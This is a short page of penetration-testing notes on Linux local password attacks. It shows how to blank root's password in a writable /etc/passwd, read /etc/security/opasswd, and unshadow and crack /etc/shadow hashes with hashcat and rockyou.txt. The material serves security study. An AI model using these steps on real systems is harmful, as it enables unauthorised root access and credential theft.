Passwd, Shadow & Opasswd

Passwd File

# It the /etc/passwd file is writable by us

# Editing /etc/passwd - Before
root:x:0:0:root:/root:/bin/bash

# Editing /etc/passwd - After
root::0:0:root:/root:/bin/bash

Shadow File

If the password field contains a character, such as ! or * the user cannot log in with a Unix password. However, other authentication methods for logging in, such as Kerberos or key-based authentication, can still be used.

Algorithm Types

$1$ – MD5
$2a$ – Blowfish
$2y$ – Eksblowfish
$5$ – SHA-256
$6$ – SHA-512

Opasswd

The PAM library (pam_unix.so) can prevent reusing old passwords. The file where old passwords are stored is the /etc/security/opasswd. Administrator/root permissions are also required to read the file if the permissions for this file have not been changed manually.

# Reading /etc/security/opasswd 
sudo cat /etc/security/opasswd

Cracking Linux Credentials

Unshadow

sudo cp /etc/passwd /tmp/passwd.bak
sudo cp /etc/shadow /tmp/shadow.bak
unshadow /tmp/passwd.bak /tmp/shadow.bak > /tmp/unshadowed.hashes

Hashcat - Cracking Unshadowed Hashes

hashcat -m 1800 -a 0 /tmp/unshadowed.hashes rockyou.txt -o /tmp/unshadowed.cracked

Hashcat - Cracking MD5 Hashes

hashcat -m 500 -a 0 md5-hashes.list rockyou.txt

PreviousCredential Hunting in Linux NextWindows Local Password Attacks

Last updated 3 years ago